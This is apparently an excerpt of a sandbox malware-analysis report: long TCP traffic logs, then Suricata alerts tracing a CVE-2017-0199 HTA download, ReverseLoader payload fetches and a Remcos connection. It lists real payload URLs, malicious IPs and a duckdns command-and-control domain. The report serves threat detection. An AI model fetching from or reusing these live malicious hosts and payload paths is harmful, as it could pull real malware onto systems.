                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.3.220.29:80 -> 192.168.2.22:49166

                    Networking

                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.29:80 -> 192.168.2.22:49166
                    Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.29:80 -> 192.168.2.22:49164
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.22:49175 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49176 -> 192.3.101.149:6946
                    Source: Network trafficSuricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.22:49178 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 192.3.220.29:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 192.3.220.29:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 192.3.220.29:80 -> 192.168.2.22:49175
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 192.3.220.29:80 -> 192.168.2.22:49175
                    Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.220.29:80 -> 192.168.2.22:49175
                    Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.220.29:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.220.29:80 -> 192.168.2.22:49178
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.220.29:80 -> 192.168.2.22:49175
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.22:49168
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.22:49174
                    Source: Malware configuration extractorURLs: banaya.duckdns.org
                    Source: unknownDNS query: name: banaya.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 192.3.220.29 192.3.220.29
                    Source: Joe Sandbox ViewIP Address: 142.215.209.78 142.215.209.78
                    Source: Joe Sandbox ViewIP Address: 198.244.140.41 198.244.140.41
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49173 -> 192.3.220.29:80
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49177 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
